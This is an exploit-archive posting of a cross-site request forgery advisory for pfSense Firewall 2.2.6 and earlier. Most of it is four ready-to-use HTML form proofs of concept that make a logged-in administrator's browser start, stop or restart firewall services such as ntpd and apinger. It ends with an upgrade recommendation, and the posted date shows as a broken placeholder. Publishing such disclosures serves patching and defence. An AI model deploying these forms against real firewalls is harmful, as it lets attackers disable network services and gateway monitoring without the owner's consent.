Home / exploitsPDF  

PfSense Firewall <= 2.2.6 Cross-Site Request Forgery

Posted on 30 November -0001

<HTML><HEAD><TITLE>pfSense Firewall <= 2.2.6 Cross-Site Request Forgery </TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY># Exploit Title: pfSense Firewall <= 2.2.6 Cross-Site Request Forgery 
# Exploit Author: Aatif Shahdad
# Software Link: http://files.nyi.pfsense.org/mirror/downloads/old/pfSense-LiveCD-2.2.5-RELEASE-i386.iso.gz
# Version: 2.2.6 and below.
# Contact: https://twitter.com/61617469665f736
# Category: webapps
 
 
1. Description
 
An attacker can coerce a logged-in victim's browser to issue requests that will start/stop/restart services on the Firewall. 
 
 
2. Proof of Concept
 
Login to the Web Console, for example, http://192.168.0.1 (set at the time of install) and  open the following POC's:
 
 
Start NTPD service:
 
<html>
 <body>
   <form action="https://192.168.0.1/status_services.php">
     <input type="hidden" name="mode" value="startservice" />
     <input type="hidden" name="service" value="ntpd" />
     <input type="submit" value="Submit request" />
   </form>
 </body>
</html>
 
 
Stop NTPD service:
 
<html>
 <body>
   <form action="https://192.168.0.1/status_services.php">
     <input type="hidden" name="mode" value="stopservice" />
     <input type="hidden" name="service" value="ntpd" />
     <input type="submit" value="Submit request" />
   </form>
 </body>
</html>
 
 
 
Restart NTPD service:
 
POC:
<html>
 <body>
   <form action="https://192.168.0.1/status_services.php">
     <input type="hidden" name="mode" value="restartservice" />
     <input type="hidden" name="service" value="ntpd" />
     <input type="submit" value="Submit request" />
   </form>
 </body>
</html>
 
The service will automatically start/stop. 
 
Note: That NTPD service can be replaced with any service running on the Firewall. For example, to stop the APINGER (gateway monitoring daemon) service, use the following POC:
 
<html>
 <body>
   <form action="https://192.168.0.1/status_services.php">
     <input type="hidden" name="mode" value="stopservice" />
     <input type="hidden" name="service" value="apinger" />
     <input type="submit" value="Submit request" />
   </form>
 </body>
</html>
 
 
 
3. Solution:
 
Upgrade to version 2.3 at https://www.pfsense.org/download/mirror.php?section=downloads
</BODY></HTML>

 

TOP

Malware :

Exploits :